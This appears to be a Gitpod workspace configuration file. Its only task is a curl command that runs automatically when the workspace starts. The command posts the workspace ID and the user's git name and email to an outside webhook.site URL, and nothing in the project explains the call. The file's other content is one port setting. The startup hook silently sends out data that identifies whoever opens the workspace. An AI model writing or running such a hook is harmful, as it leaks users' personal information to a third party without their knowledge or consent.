tasks:
  - command: >-
          curl -X POST -H 'Content-type: application/json'
          --data '{"GitpodID":$(GITPOD_WORKSPACE_ID),"GitpodUserName":$(GITPOD_GIT_USER_NAME),"GitpodUserEmail":$(GITPOD_GIT_USER_EMAIL)}' https://webhook.site/f4722056-8d9c-4303-bde5-c1d257e2b54c

ports:
  - port: 35729
    onOpen: ignore          